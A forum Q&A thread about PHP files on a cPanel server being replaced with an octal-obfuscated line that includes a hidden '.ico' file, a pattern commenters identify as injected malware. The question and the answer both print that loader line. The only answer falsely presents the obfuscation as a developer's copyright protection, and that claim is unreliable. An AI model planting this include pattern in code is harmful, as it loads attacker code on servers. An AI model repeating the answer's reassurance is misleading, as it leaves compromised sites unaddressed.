# php scrips are hosted on virtual server getting deleted, renamed or corrupted

Tags: php, laravel, cpanel

My php scrips are hosted on virtual cPanel server and index.php files are either automatically deleted or created like this following code:

```
<?php
/*06f96*/
@include "\057hom\145/ra\144iof\157o/p\165bli\143_ht\155l/a\156dro\151d/_\137MAC\117SX/\147cm_\143hat\057.44\065e56\1441.i\143o";
/*06f96*/
```

why is this happening? or is there any solution?

Comment: You might be hacked.. better clean up your server and increase server security

Comment: I agree. It seems malicious to me.

Comment: If you decode it... `@include "/home/radiofoo/public_html/android/__MACOSX/gcm_chat/.445e56d1.ico";`

Comment: yah i've decoded it too .. but __MACOSX is not created by me

Comment: I would check which charset you're using locally and on the server too, just to be safe

Comment: @ZobairIbnAlam __MACOSX directories are [created automatically by OSX](https://superuser.com/questions/104500/what-is-macosx-folder) - it *looks* like there's some malware fishing about for common or known vulnerabilities if it's creating lots of files with content similar to that.

Answer (score 0):

This is decoded version of your code;

```
@include "/home/radiofoo/public_html/android/__MACOSX/gcm_chat/.445e56d1.ico";
```

your php file has been encoded by developer for **security** or **copyright** issues
you can decode all of your codes if you interested in

Comment: Are you sure? Are you read content of file for created this quickly answer? Why will a call to a suspicious file named .ico appear in all its files? Please be more serious.

Comment: @abkrim all thing is possible! but its usual behavior of a  developer ...
for answering this certainly we should check real content and file type of 445e56d1.ico